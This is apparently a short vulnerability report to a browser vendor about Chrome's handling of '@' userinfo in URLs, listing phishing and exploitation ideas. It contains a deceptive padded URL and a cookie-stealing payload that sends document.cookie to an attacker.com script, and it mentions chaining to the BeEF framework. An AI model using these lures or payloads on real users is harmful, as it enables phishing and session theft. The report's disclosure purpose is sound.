hello sir, so, here are various exploitation techniques:- 1) i can create a .html file which when opened by victim in his chrome browser(after attacker does some social engineering) would have a link which when clicked by victim redirects him . # here http auth info becoming grey will not help!! as after clicking link the victim will be directly redirected to attacker's site. 2) I can directly mail the link as (https://www.google.com@@@@@@@@@@@@@@@@@@@facebook.com) to the victim(having chrome browser) these @'s are to avoid suspision bdw it can be encoded as well. 3)i can also steal cookies using a payload like https://www.google.com@attacker.com/cookies.php?cookie=" +document.cookie; then cookies will be send to cookies.php file at attacker's domain. 4)OR after redirection i can redirect victim to page that has js embedded with the help of BEEF(browser exploitation framework) software and exploit the victim's pc remotely. for more info about beef go to http://hackies.in/thegooglehack.html. and many more.... this all is happening just because of not having a pop up implementation in browser when handling such requests causing remote exploitation of a person using chrome browser.